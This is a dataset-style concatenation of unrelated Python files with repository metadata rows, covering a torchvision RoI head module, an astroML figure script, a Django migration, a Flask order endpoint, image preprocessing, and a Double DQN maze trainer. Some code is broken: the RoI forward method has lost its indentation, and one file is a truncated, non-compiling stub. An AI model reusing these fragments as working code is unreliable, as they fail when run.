                           (x_0 - box[0]):(x_1 - box[0])]

    # TODO : replace below with a dynamic padding when support is added in ONNX
    # pad y
    zeros_y0 = torch.zeros(y_0, unpaded_im_mask.size(1))
    zeros_y1 = torch.zeros(im_h - y_1, unpaded_im_mask.size(1))
    concat_0 = torch.cat((zeros_y0,
                          unpaded_im_mask.to(dtype=torch.float32),
                          zeros_y1), 0)[0:im_h, :]
    # pad x
    zeros_x0 = torch.zeros(concat_0.size(0), x_0)
    zeros_x1 = torch.zeros(concat_0.size(0), im_w - x_1)
    im_mask = torch.cat((zeros_x0,
                         concat_0,
                         zeros_x1), 1)[:, :im_w]
    return im_mask
@torch.jit.script
def _onnx_paste_masks_in_image_loop(masks, boxes, im_h, im_w):
    """Scripted per-mask loop used during ONNX export.

    Pastes each [1, H, W] mask into the image and accumulates the results by
    concatenation (torch.cat), since dynamic list stacking is not exportable.
    """
    res_append = torch.zeros(0, im_h, im_w)
    for i in range(masks.size(0)):
        mask_res = _onnx_paste_mask_in_image(masks[i][0], boxes[i], im_h, im_w)
        mask_res = mask_res.unsqueeze(0)
        res_append = torch.cat((res_append, mask_res))
    return res_append
def paste_masks_in_image(masks, boxes, img_shape, padding=1):
    # type: (Tensor, Tensor, Tuple[int, int], int)
    """Paste per-box masks back into full-image masks of shape [N, 1, H, W]."""
    masks, scale = expand_masks(masks, padding=padding)
    boxes = expand_boxes(boxes, scale).to(dtype=torch.int64)
    im_h, im_w = img_shape

    if torchvision._is_tracing():
        return _onnx_paste_masks_in_image_loop(
            masks, boxes,
            torch.scalar_tensor(im_h, dtype=torch.int64),
            torch.scalar_tensor(im_w, dtype=torch.int64))[:, None]

    pasted = [paste_mask_in_image(m[0], b, im_h, im_w) for m, b in zip(masks, boxes)]
    if pasted:
        return torch.stack(pasted, dim=0)[:, None]
    # No detections: keep the [0, 1, H, W] shape contract.
    return masks.new_empty((0, 1, im_h, im_w))
class RoIHeads(torch.nn.Module):
    """Second-stage detection heads: box classification/regression plus
    optional mask and keypoint branches, operating on RPN proposals."""
    # Torchscript attribute type declarations.
    __annotations__ = {
        'box_coder': det_utils.BoxCoder,
        'proposal_matcher': det_utils.Matcher,
        'fg_bg_sampler': det_utils.BalancedPositiveNegativeSampler,
    }
def __init__(self,
             box_roi_pool,
             box_head,
             box_predictor,
             # Faster R-CNN training
             fg_iou_thresh, bg_iou_thresh,
             batch_size_per_image, positive_fraction,
             bbox_reg_weights,
             # Faster R-CNN inference
             score_thresh,
             nms_thresh,
             detections_per_img,
             # Mask
             mask_roi_pool=None,
             mask_head=None,
             mask_predictor=None,
             keypoint_roi_pool=None,
             keypoint_head=None,
             keypoint_predictor=None,
             ):
    """Wire up proposal matching, fg/bg sampling, box coding and the
    per-task sub-modules (box always; mask/keypoint only if all three of
    their components are provided).
    """
    super(RoIHeads, self).__init__()

    self.box_similarity = box_ops.box_iou
    # assign ground-truth boxes for each proposal
    self.proposal_matcher = det_utils.Matcher(
        fg_iou_thresh,
        bg_iou_thresh,
        allow_low_quality_matches=False)

    self.fg_bg_sampler = det_utils.BalancedPositiveNegativeSampler(
        batch_size_per_image,
        positive_fraction)

    # Default Faster R-CNN regression weights when none are supplied.
    if bbox_reg_weights is None:
        bbox_reg_weights = (10., 10., 5., 5.)
    self.box_coder = det_utils.BoxCoder(bbox_reg_weights)

    self.box_roi_pool = box_roi_pool
    self.box_head = box_head
    self.box_predictor = box_predictor

    # Inference-time filtering thresholds.
    self.score_thresh = score_thresh
    self.nms_thresh = nms_thresh
    self.detections_per_img = detections_per_img

    self.mask_roi_pool = mask_roi_pool
    self.mask_head = mask_head
    self.mask_predictor = mask_predictor

    self.keypoint_roi_pool = keypoint_roi_pool
    self.keypoint_head = keypoint_head
    self.keypoint_predictor = keypoint_predictor
def has_mask(self):
    """Whether the mask branch is fully configured (pool, head and predictor)."""
    mask_parts_present = (self.mask_roi_pool is not None
                          and self.mask_head is not None
                          and self.mask_predictor is not None)
    return mask_parts_present
def has_keypoint(self):
    """Whether the keypoint branch is fully configured (pool, head and predictor)."""
    keypoint_parts_present = (self.keypoint_roi_pool is not None
                              and self.keypoint_head is not None
                              and self.keypoint_predictor is not None)
    return keypoint_parts_present
def assign_targets_to_proposals(self, proposals, gt_boxes, gt_labels):
    # type: (List[Tensor], List[Tensor], List[Tensor])
    """Match each proposal to a ground-truth box and derive its class label.

    Returns per-image lists (matched_idxs, labels): matched_idxs holds the
    clamped GT index for each proposal; labels holds its class, with
    0 = background and -1 = ignored by the sampler.
    """
    matched_idxs = []
    labels = []
    for proposals_in_image, gt_boxes_in_image, gt_labels_in_image in zip(proposals, gt_boxes, gt_labels):
        if gt_boxes_in_image.numel() == 0:
            # Background image
            device = proposals_in_image.device
            clamped_matched_idxs_in_image = torch.zeros(
                (proposals_in_image.shape[0],), dtype=torch.int64, device=device
            )
            labels_in_image = torch.zeros(
                (proposals_in_image.shape[0],), dtype=torch.int64, device=device
            )
        else:
            #  set to self.box_similarity when https://github.com/pytorch/pytorch/issues/27495 lands
            match_quality_matrix = box_ops.box_iou(gt_boxes_in_image, proposals_in_image)
            matched_idxs_in_image = self.proposal_matcher(match_quality_matrix)

            # Clamp so the matcher's negative sentinel values can still be
            # used to index gt_labels below.
            clamped_matched_idxs_in_image = matched_idxs_in_image.clamp(min=0)

            labels_in_image = gt_labels_in_image[clamped_matched_idxs_in_image]
            labels_in_image = labels_in_image.to(dtype=torch.int64)

            # Label background (below the low threshold)
            bg_inds = matched_idxs_in_image == self.proposal_matcher.BELOW_LOW_THRESHOLD
            labels_in_image[bg_inds] = torch.tensor(0)

            # Label ignore proposals (between low and high thresholds)
            ignore_inds = matched_idxs_in_image == self.proposal_matcher.BETWEEN_THRESHOLDS
            labels_in_image[ignore_inds] = torch.tensor(-1)  # -1 is ignored by sampler

        matched_idxs.append(clamped_matched_idxs_in_image)
        labels.append(labels_in_image)
    return matched_idxs, labels
def subsample(self, labels):
    # type: (List[Tensor])
    """Return, per image, the indices of the sampled positive+negative proposals."""
    sampled_pos_inds, sampled_neg_inds = self.fg_bg_sampler(labels)
    sampled_inds = []
    for pos_inds_img, neg_inds_img in zip(sampled_pos_inds, sampled_neg_inds):
        combined_mask = pos_inds_img | neg_inds_img
        sampled_inds.append(torch.nonzero(combined_mask).squeeze(1))
    return sampled_inds
def add_gt_proposals(self, proposals, gt_boxes):
    # type: (List[Tensor], List[Tensor])
    """Concatenate each image's ground-truth boxes onto its proposal set."""
    merged = []
    for proposal, gt_box in zip(proposals, gt_boxes):
        merged.append(torch.cat((proposal, gt_box)))
    return merged
def DELTEME_all(self, the_list):
    # type: (List[bool])
    """Torchscript-compatible stand-in for all(): True iff every entry is truthy."""
    result = True
    for flag in the_list:
        result = result and flag
    return result
def check_targets(self, targets):
    # type: (Optional[List[Dict[str, Tensor]]])
    """Assert that every target dict carries the keys this head consumes."""
    assert targets is not None
    for required_key in ["boxes", "labels"]:
        assert self.DELTEME_all([required_key in t for t in targets])
    if self.has_mask():
        assert self.DELTEME_all(["masks" in t for t in targets])
def select_training_samples(self, proposals, targets):
    # type: (List[Tensor], Optional[List[Dict[str, Tensor]]])
    """Prepare the box-head training batch.

    Appends GT boxes to the proposals, matches proposals to targets, then
    subsamples a fixed positive/negative proportion per image.

    Returns (proposals, matched_idxs, labels, regression_targets), each a
    per-image list.
    """
    self.check_targets(targets)
    assert targets is not None
    dtype = proposals[0].dtype
    device = proposals[0].device

    gt_boxes = [t["boxes"].to(dtype) for t in targets]
    gt_labels = [t["labels"] for t in targets]

    # append ground-truth bboxes to proposals so every GT has a perfect match
    proposals = self.add_gt_proposals(proposals, gt_boxes)

    # get matching gt indices for each proposal
    matched_idxs, labels = self.assign_targets_to_proposals(proposals, gt_boxes, gt_labels)
    # sample a fixed proportion of positive-negative proposals
    sampled_inds = self.subsample(labels)
    matched_gt_boxes = []
    num_images = len(proposals)
    for img_id in range(num_images):
        img_sampled_inds = sampled_inds[img_id]
        proposals[img_id] = proposals[img_id][img_sampled_inds]
        # BUGFIX: the original forced `.cuda()` here, which crashes on
        # CPU-only setups and is inconsistent with the device-agnostic
        # handling in the rest of this module. Indexing already keeps the
        # labels on their current device.
        labels[img_id] = labels[img_id][img_sampled_inds]
        matched_idxs[img_id] = matched_idxs[img_id][img_sampled_inds]

        gt_boxes_in_image = gt_boxes[img_id]
        if gt_boxes_in_image.numel() == 0:
            # Background-only image: dummy box keeps the indexing below valid.
            gt_boxes_in_image = torch.zeros((1, 4), dtype=dtype, device=device)
        matched_gt_boxes.append(gt_boxes_in_image[matched_idxs[img_id]])

    regression_targets = self.box_coder.encode(matched_gt_boxes, proposals)
    return proposals, matched_idxs, labels, regression_targets
def postprocess_detections(self, class_logits, box_regression, proposals, image_shapes):
    # type: (Tensor, Tensor, List[Tensor], List[Tuple[int, int]])
    """Turn raw box-head outputs into final per-image detections.

    Decodes the regressed boxes and softmaxes the logits, then per image:
    clips boxes to the image, drops the background column, applies the score
    threshold, removes tiny boxes, runs per-class NMS and keeps at most
    detections_per_img results.
    """
    device = class_logits.device
    num_classes = class_logits.shape[-1]

    boxes_per_image = [boxes_in_image.shape[0] for boxes_in_image in proposals]
    pred_boxes = self.box_coder.decode(box_regression, proposals)

    pred_scores = F.softmax(class_logits, -1)

    # Split the flat batch back into per-image chunks.
    pred_boxes_list = pred_boxes.split(boxes_per_image, 0)
    pred_scores_list = pred_scores.split(boxes_per_image, 0)

    all_boxes = []
    all_scores = []
    all_labels = []
    for boxes, scores, image_shape in zip(pred_boxes_list, pred_scores_list, image_shapes):
        boxes = box_ops.clip_boxes_to_image(boxes, image_shape)

        # create labels for each prediction
        labels = torch.arange(num_classes, device=device)
        labels = labels.view(1, -1).expand_as(scores)

        # remove predictions with the background label (column 0)
        boxes = boxes[:, 1:]
        scores = scores[:, 1:]
        labels = labels[:, 1:]

        # batch everything, by making every class prediction be a separate instance
        boxes = boxes.reshape(-1, 4)
        scores = scores.reshape(-1)
        labels = labels.reshape(-1)

        # remove low scoring boxes
        inds = torch.nonzero(scores > self.score_thresh).squeeze(1)
        boxes, scores, labels = boxes[inds], scores[inds], labels[inds]

        # remove empty boxes
        keep = box_ops.remove_small_boxes(boxes, min_size=1e-2)
        boxes, scores, labels = boxes[keep], scores[keep], labels[keep]

        # non-maximum suppression, independently done per class
        keep = box_ops.batched_nms(boxes, scores, labels, self.nms_thresh)
        # keep only topk scoring predictions
        keep = keep[:self.detections_per_img]
        boxes, scores, labels = boxes[keep], scores[keep], labels[keep]

        all_boxes.append(boxes)
        all_scores.append(scores)
        all_labels.append(labels)

    return all_boxes, all_scores, all_labels
def forward(self, features, proposals, image_shapes, targets=None):
# type: (Dict[str, Tensor], List[Tensor], List[Tuple[int, int]], Optional[List[Dict[str, Tensor]]])
"""
Arguments:
features (List[Tensor])
proposals (List[Tensor[N, 4]])
image_shapes (List[Tuple[H, W]])
targets (List[Dict])
"""
#print('targets type:', type(targets))
if targets is not None:
for t in targets:
if t["labels"].dtype != torch.int64:
t["labels"] = t["labels"].type(torch.LongTensor)
# TODO: https://github.com/pytorch/pytorch/issues/26731
floating_point_types = (torch.float, torch.double, torch.half)
assert t["boxes"].dtype in floating_point_types, 'target boxes must of float type'
assert t["labels"].dtype == torch.int64, 'target labels must of int64 type'
if self.has_keypoint():
assert t["keypoints"].dtype == torch.float32, 'target keypoints must of float type'
#if self.training:
proposals, matched_idxs, labels, regression_targets = self.select_training_samples(proposals, targets)
box_features = self.box_roi_pool(features, proposals, image_shapes)
box_features = self.box_head(box_features)
class_logits, box_regression = self.box_predictor(box_features)
result = torch.jit.annotate(List[Dict[str, torch.Tensor]], [])
losses = {}
#if self.training:
assert labels is not None and regression_targets is not None
loss_classifier, loss_box_reg = fastrcnn_loss(
class_logits, box_regression, labels, regression_targets)
losses = {
"loss_classifier": loss_classifier,
"loss_box_reg": loss_box_reg
}
if self.has_mask():
mask_proposals = [p["boxes"] for p in result]
#if self.training:
assert matched_idxs is not None
# during training, only focus on positive boxes
num_images = len(proposals)
mask_proposals = []
pos_matched_idxs = []
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
mask_proposals.append(proposals[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
if self.mask_roi_pool is not None:
mask_features = self.mask_roi_pool(features, mask_proposals, image_shapes)
mask_features = self.mask_head(mask_features)
mask_logits = self.mask_predictor(mask_features)
else:
mask_logits = torch.tensor(0)
raise Exception("Expected mask_roi_pool to be not None")
loss_mask = {}
#if self.training:
assert targets is not None
assert pos_matched_idxs is not None
assert mask_logits is not None
gt_masks = [t["masks"] for t in targets]
gt_labels = [t["labels"] for t in targets]
rcnn_loss_mask = maskrcnn_loss(
mask_logits, mask_proposals,
gt_masks, gt_labels, pos_matched_idxs)
loss_mask = {
"loss_mask": rcnn_loss_mask
}
losses.update(loss_mask)
# keep none checks in if conditional so torchscript will conditionally
# compile each branch
if self.keypoint_roi_pool is not None and self.keypoint_head is not None \
and self.keypoint_predictor is not None:
keypoint_proposals = [p["boxes"] for p in result]
#if self.training:
# during training, only focus on positive boxes
num_images = len(proposals)
keypoint_proposals = []
pos_matched_idxs = []
assert matched_idxs is not None
for img_id in range(num_images):
pos = torch.nonzero(labels[img_id] > 0).squeeze(1)
keypoint_proposals.append(proposals[img_id][pos])
pos_matched_idxs.append(matched_idxs[img_id][pos])
keypoint_features = self.keypoint_roi_pool(features, keypoint_proposals, image_shapes)
keypoint_features = self.keypoint_head(keypoint_features)
keypoint_logits = self.keypoint_predictor(keypoint_features)
loss_keypoint = {}
#if self.training:
assert targets is not None
assert pos_matched_idxs is not None
gt_keypoints = [t["keypoints"] for t in targets]
rcnn_loss_keypoint = keypointrcnn_loss(
keypoint_logits, keypoint_proposals,
gt_keypoints, pos_matched_idxs)
loss_keypoint = {
"loss_keypoint": rcnn_loss_keypoint
}
losses.update(loss_keypoint)
return result, losses | [
"820001401@qq.com"
] | 820001401@qq.com |
bf880139591dc7c773d8e6bf7be78b1c793a73ef | 364b36d699d0a6b5ddeb43ecc6f1123fde4eb051 | /_downloads_1ed/fig_poisson_continuous.py | 686b96403de5b92c73a2308049b03cfd324a149b | [] | no_license | astroML/astroml.github.com | eae3bfd93ee2f8bc8b5129e98dadf815310ee0ca | 70f96d04dfabcd5528978b69c217d3a9a8bc370b | refs/heads/master | 2022-02-27T15:31:29.560052 | 2022-02-08T21:00:35 | 2022-02-08T21:00:35 | 5,871,703 | 2 | 5 | null | 2022-02-08T21:00:36 | 2012-09-19T12:55:23 | HTML | UTF-8 | Python | false | false | 3,102 | py | """
Unbinned Poisson Data
---------------------
Figure 5.14
Regression of unbinned data. The distribution of N = 500 data points is shown
in the left panel; the true pdf is shown by the solid curve. Note that although
the data are binned in the left panel for visualization purposes, the analysis
is performed on the unbinned data. The right panel shows the likelihood for the
slope a (eq. 5.88) for three different sample sizes. The input value is
indicated by the vertical dotted line.
"""
# Author: Jake VanderPlas
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from astroML.stats.random import linear
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def linprob_logL(x, a, xmin, xmax):
    """Log-likelihood of slope(s) *a* for data *x* drawn from the linear pdf
    p(x) = a * (x - mu) + 1 / W on [xmin, xmax], summed over the data axis.

    *a* may be an array of candidate slopes; the sum is taken over the
    trailing (data) axis via broadcasting.
    """
    data = x.ravel()
    slopes = a.reshape(a.shape + (1,))
    midpoint = 0.5 * (xmin + xmax)
    width = xmax - xmin
    pdf_vals = slopes * (data - midpoint) + 1. / width
    return np.log(pdf_vals).sum(-1)
#----------------------------------------------------------------------
# Draw the data from the linear distribution
np.random.seed(0)  # fixed seed so the published figure is reproducible

N = 500
a_true = 0.01
xmin = 0.0
xmax = 10.0

lin_dist = linear(xmin, xmax, a_true)
data = lin_dist.rvs(N)
x = np.linspace(xmin - 1, xmax + 1, 1000)
px = lin_dist.pdf(x)

#------------------------------------------------------------
# Plot the results
fig = plt.figure(figsize=(5, 2.5))
fig.subplots_adjust(left=0.12, right=0.95, wspace=0.28,
                    bottom=0.15, top=0.9)

# left panel: plot the model and a histogram of the data
ax1 = fig.add_subplot(121)
# NOTE(review): `normed=True` was removed in matplotlib 3.x; modern matplotlib
# requires `density=True` here — confirm the targeted matplotlib version.
ax1.hist(data, bins=np.linspace(0, 10, 11), normed=True,
         histtype='stepfilled', fc='gray', alpha=0.5)
ax1.plot(x, px, '-k')
ax1.set_xlim(-1, 11)
ax1.set_ylim(0, 0.18)
ax1.set_xlabel('$x$')
ax1.set_ylabel('$p(x)$')

# right panel: construct and plot the likelihood
ax2 = fig.add_subplot(122)
ax2.xaxis.set_major_locator(plt.MultipleLocator(0.01))

a = np.linspace(-0.01, 0.02, 1000)
Npts = (500, 100, 20)
styles = ('-k', '--b', '-.g')

for n, s in zip(Npts, styles):
    logL = linprob_logL(data[:n], a, xmin, xmax)
    # Normalize in linear space so the curves are comparable pdfs over a.
    logL = np.exp(logL - logL.max())
    logL /= logL.sum() * (a[1] - a[0])
    ax2.plot(a, logL, s, label=r'$\rm %i\ pts$' % n)

ax2.legend(loc=2, prop=dict(size=8))
ax2.set_xlim(-0.011, 0.02)
ax2.set_xlabel('$a$')
ax2.set_ylabel('$p(a)$')

# vertical line: in newer matplotlib versions, use ax.vlines([a_true])
ylim = ax2.get_ylim()
ax2.plot([a_true, a_true], ylim, ':k', lw=1)
ax2.set_ylim(ylim)

plt.show()
| [
"vanderplas@astro.washington.edu"
] | vanderplas@astro.washington.edu |
fb6d0251fe6ca08954b8d6eb6b5819a007eb479e | e51ceaf0965f6c8bc6819be7a0659f68a5e0f494 | /meldining/migrations/0001_initial.py | b790376ac9dab13c1078b72583de08d3a45e1175 | [] | no_license | zyrsas/Meldining | dc3b4650d5561e1fb864ff4397451584352187ba | a4399c3928481ac112443f9dba9b96e9144e8f3e | refs/heads/master | 2020-03-17T14:25:29.621633 | 2018-05-16T13:43:26 | 2018-05-16T13:43:26 | 133,671,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,294 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-05-16 12:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Cuisine and CuisineType
    tables (both with an image FileField; CuisineType adds contact/price
    text columns)."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Cuisine',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100, verbose_name='Title')),
                ('file', models.FileField(upload_to='', verbose_name='Image')),
            ],
        ),
        migrations.CreateModel(
            name='CuisineType',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100, verbose_name='Title')),
                ('file', models.FileField(upload_to='', verbose_name='Image')),
                ('description', models.CharField(max_length=300)),
                ('address', models.CharField(max_length=300)),
                ('tel', models.CharField(max_length=300)),
                ('price', models.CharField(max_length=300)),
            ],
        ),
    ]
| [
"zyrsas@gmail.com"
] | zyrsas@gmail.com |
f50bdb4996105f6ed0b9c648a3fcff1ec31af93a | d0e0b5bb93a3aedb5c8ae97219fba03b24a84e7c | /scripting.py | ef8a3e86654e46a303e9e6edb079ac85629f0f36 | [] | no_license | R3LYK/social_media_stock_mentions | 031ecb847cfb3a30008f796abc33a5e8f3c30ff1 | cf8f3d48263fa41f74aae8bea16306156f10f307 | refs/heads/main | 2023-08-17T11:48:21.189450 | 2021-09-13T19:09:01 | 2021-09-13T19:09:01 | 405,258,136 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | import csv
def row_factory(row) | [
"kyler.pettitt@gmail.com"
] | kyler.pettitt@gmail.com |
e4ca782977736d9954c8673fb792ca854051d919 | cb2e148af9601b9e11bdad097cca840bc4cc4bb0 | /backend/app/resources/orderResource.py | b1fd66907edd312189420114a1d7de1a911e0c91 | [] | no_license | jgavirias13/pruebaTecnicaSigma | 560df64ca8e4caf1ab1a6ac7cd3624e485351d1f | b6ed42d15c9d842e242d984d11f79134a379e39d | refs/heads/main | 2023-03-28T01:03:04.154030 | 2021-03-25T05:05:47 | 2021-03-25T05:05:47 | 351,245,247 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | from flask_restful import Resource
from flask import request
from app.schema.orderSchema import OrderSchema
from app.models.order import Order
from app.models.product import Product
from app.common.util import calculateTotalCompra
orderSchema = OrderSchema()
class OrderResource(Resource):
def post(self):
data = request.get_json()
orderDict = orderSchema.load(data)
product = Product.get_by_id((orderDict['product']['id']))
order = Order(orderDict['productName'], orderDict['totalProduct'],
orderDict['totalCompra'], product)
totalCalculado = calculateTotalCompra(product)
if(totalCalculado != order.totalCompra):
print(totalCalculado)
print('error son diferentes')
else:
order.save()
resp = orderSchema.dump(order)
return resp, 201 | [
"jgavirias13@gmail.com"
] | jgavirias13@gmail.com |
52e88576c46178114061c73d824c6421f1a462db | 0ad2ef394f5c5811ebcb74f99da34d94ca97ef60 | /preprocessor.py | 5c2a6c8bf56c5fda83a9e08f97c7db06bd5073c1 | [] | no_license | efazs/bangla-handwritten-recognision- | ba768808756d20a18d13584638960e3f7f79a883 | 280749e7061e2a53d43c9ed8616f0c0a65f98f81 | refs/heads/master | 2021-10-24T19:24:48.208064 | 2019-03-27T17:54:46 | 2019-03-27T17:54:46 | 178,053,593 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,373 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 6 03:18:05 2019
@author: Efas
"""
# Import libraries
import os,cv2
import numpy as np
from PIL import Image
from numpy import *
import numpy as np
# --- paths and hyper-parameter configuration ---
path1 =r"G:\pics\before_reform_originalS"#path containg the original image
#path1=r"G:\pics\pilo\before_reform_originals\0"
#path2 =r"G:\pics\after_reform"
path2 =r"G:\pics\pilo\before_reform_originals" #path where the new image is to be stored
cvpath=path2
image_size=56#56
filter_number=32#64
Batch_size=10#64
dropoutvar=0.2# default for so many days 0.3
classsize=12
classwidth=250
#image_size=32#110
cv_imsize=(image_size,image_size)

listening = os.listdir(path1)
num_samples = size(listening)

# (earlier PIL-based resize variant, kept for reference)
#for file in listening:
#    im = Image.open(path1+'\\'+file)
#    img = im.resize((image_size,image_size))
#    gray = img.convert('L')
#    gray.save(path2+'\\'+file,"JPEG")

# Grayscale + Otsu-binarize every source image, resize it to
# (image_size, image_size) and write it to cvpath.
for file in listening:
    #im = Image.open(path1+'\\'+file)
    im = cv2.imread(path1+'\\'+file)
    #img = im.resize((image_size,image_size))
    #gray = img.convert('L')
    gray= cv2.cvtColor(im,cv2.COLOR_BGR2GRAY)
    (thresh,bn)=cv2.threshold(gray,128,255,cv2.THRESH_BINARY|cv2.THRESH_OTSU)
    #bn.save(path2+'\\'+file,"JPEG")
    img=cv2.resize(bn,cv_imsize,interpolation = cv2.INTER_AREA)
    cv2.imwrite(cvpath+'\\'+file,img)
# Data augmentation: for every PNG in the working directory, generate rotated
# copies at +/-3, 6, 9, 12 and 15 degrees, pasted onto a white 64x64 canvas,
# and save them under the '0/' subdirectory as <name>L<angle> / <name>R<angle>.
# (Replaces ten copy-pasted rotate/save stanzas with a single loop; the files
# written, their names and their order are unchanged. Also drops the unused
# `list = []` that shadowed the builtin.)
size_64 = cv_imsize
for f in os.listdir('.'):
    if f.endswith('.png'):
        source_img = Image.open(f)
        fn, fext = os.path.splitext(f)
        print(fn)
        dst_im = Image.new("RGB", (64, 64), "white")  # white background canvas
        im = source_img.convert('RGBA')  # RGBA so the rotation can mask itself on paste
        for angle in (3, 6, 9, 12, 15):
            # counter-clockwise ("L") rotation
            rot = im.rotate(angle, expand=1).resize(size_64)
            dst_im.paste(rot, (0, 0), rot)
            dst_im.save('0/{}L{}{}'.format(fn, angle, fext))
            # clockwise ("R") rotation
            rot = im.rotate(-angle, expand=1).resize(size_64)
            dst_im.paste(rot, (0, 0), rot)
            dst_im.save('0/{}R{}{}'.format(fn, angle, fext))
| [
"ns.efas@gmail.com"
] | ns.efas@gmail.com |
353f081526d1adc98c5c58ccd4e63448de00b336 | e845aa989b0dc8315ded987e419931fe73f90bcb | /find_difference.py | ce3702730b2066bf9787f87952dfe4ec69ddfd02 | [] | no_license | rolandobloom/find_difference_task | 6ee2c0b6d7dee4521e916d83c10aa4330f42da19 | 2474bfc7a941d36d7a71b70d64965697ddc4a387 | refs/heads/main | 2023-06-09T02:34:14.111188 | 2021-07-01T06:23:57 | 2021-07-01T06:23:57 | 309,392,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | import re
from methods import ReverseWithReversed
if __name__ == '__main__':
array_a = list(map(int, re.findall(r'[^,\.\s]+', input('enter array A:'))))
array_b = list(map(int, re.findall(r'[^,\.\s]+', input('enter array B:'))))
result = ReverseWithReversed.find_difference(array_a, array_b)
print(f'Min difference: {result}')
| [
"rszocki@bankier.pl"
] | rszocki@bankier.pl |
64ad76f77783d4b8a4cb1b9d87b673ea62470bf1 | f566dfc5ce189d30696b9bf8b7e8bf9b1ef45614 | /Example/DQN_SimpleMaze/DoubleDQN_SimpleMazeTwoD.py | a8615b896bcd6023b12a714b7533a963e26b7691 | [] | no_license | yangyutu/DeepReinforcementLearning-PyTorch | 3dac4ad67fa3a6301d65ca5c63532f2a278e21d7 | 7af59cb883e24429d42a228584cfc96c42f6d35b | refs/heads/master | 2022-08-16T13:46:30.748383 | 2022-07-30T05:47:47 | 2022-07-30T05:47:47 | 169,829,723 | 12 | 6 | null | null | null | null | UTF-8 | Python | false | false | 2,382 | py |
from Agents.DQN.DQN import DQNAgent
from Agents.Core.MLPNet import MultiLayerNetRegression
import json
from torch import optim
from copy import deepcopy
from Env.CustomEnv.SimpleMazeTwoD import SimpleMazeTwoD
import numpy as np
import matplotlib.pyplot as plt
import torch
torch.manual_seed(1)
def plotPolicy(policy, nbActions):
    """Scatter-plot every valid grid cell (policy >= 0), colored by its action.

    Cells with policy < 0 (walls / invalid states) are omitted. *nbActions*
    is kept for interface compatibility but is not used here.
    """
    rows, cols = np.where(policy >= 0)
    cell_actions = policy[rows, cols]
    plt.scatter(rows, cols, c=cell_actions, marker='s', s=10)
# first construct the neutral network
# --- Double-DQN hyper-parameters ---
config = dict()
mapName = 'map.txt'
config['trainStep'] = 1000
config['epsThreshold'] = 0.1
config['targetNetUpdateStep'] = 100
config['memoryCapacity'] = 2000
config['trainBatchSize'] = 32
config['gamma'] = 0.9
config['learningRate'] = 0.003
config['netGradClip'] = 1
config['logFlag'] = True
config['logFileName'] = 'SimpleMazeLog/DoubleQtraj' + mapName
config['logFrequency'] = 50
config['netUpdateOption'] = 'doubleQ'

# Environment and network dimensions.
env = SimpleMazeTwoD(mapName)
N_S = env.stateDim
N_A = env.nbActions

netParameter = dict()
netParameter['n_feature'] = N_S
netParameter['n_hidden'] = [100]
netParameter['n_output'] = N_A

policyNet = MultiLayerNetRegression(netParameter['n_feature'],
                                    netParameter['n_hidden'],
                                    netParameter['n_output'])

print(policyNet.state_dict())
targetNet = deepcopy(policyNet)

optimizer = optim.Adam(policyNet.parameters(), lr=config['learningRate'])

agent = DQNAgent(policyNet, targetNet, env, optimizer, torch.nn.MSELoss() ,N_S, N_A, config=config)

# Dump the greedy policy over the maze grid BEFORE training (-1 marks walls).
policy = deepcopy(env.map)
for i in range(policy.shape[0]):
    for j in range(policy.shape[1]):
        if env.map[i, j] == 0:
            policy[i, j] = -1
        else:
            policy[i, j] = agent.getPolicy(np.array([i, j]))

np.savetxt('DoubleQSimpleMazePolicyBeforeTrain' + mapName + '.txt', policy, fmt='%d', delimiter='\t')
plotPolicy(policy, N_A)

agent.train()

# Dump the greedy policy again AFTER training for comparison.
policy = deepcopy(env.map)
for i in range(policy.shape[0]):
    for j in range(policy.shape[1]):
        if env.map[i, j] == 0:
            policy[i, j] = -1
        else:
            policy[i, j] = agent.getPolicy(np.array([i, j]))

np.savetxt('DoubleQSimpleMazePolicyAfterTrain' + mapName +'.txt', policy, fmt='%d', delimiter='\t')
plotPolicy(policy, N_A) | [
"yangyutu123@gmail.com"
] | yangyutu123@gmail.com |
51c50551241db4e366b3aea0efdd7ca6f78e8961 | 6fa371c04848cb68c0b1d58533fdd89b7a176008 | /drawing.py | 84ea5dbdfc6f87f20e197b0f81dc156e04dc5e8f | [] | no_license | solversa/coordination | acc626094246f622a45409d0f704f3407286dce9 | 1b115fdb76f58e10402767bf65103b9dd197376b | refs/heads/master | 2021-06-19T01:03:36.974354 | 2017-04-24T05:39:34 | 2017-04-24T05:39:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,144 | py | import numpy as np
import tensorflow as tf
import gym
from utils import *
import random
import os
class Policy():
    """TF1-style Gaussian MLP policy restored from the latest checkpoint.

    Builds either one shared network ("single") or one small network per
    action dimension ("multiple"); each outputs the mean and log-std of a
    diagonal Gaussian over actions. NOTE(review): written for Python 2 /
    TensorFlow 1.x (xrange, tf.pack, initialize_all_variables).
    """
    def __init__(self, observation_space, action_space):
        self.observation_space = observation_space
        self.action_space = action_space
        self.observation_size = self.observation_space.shape[0]
        self.action_size = np.prod(self.action_space.shape)
        self.hidden_size = 8

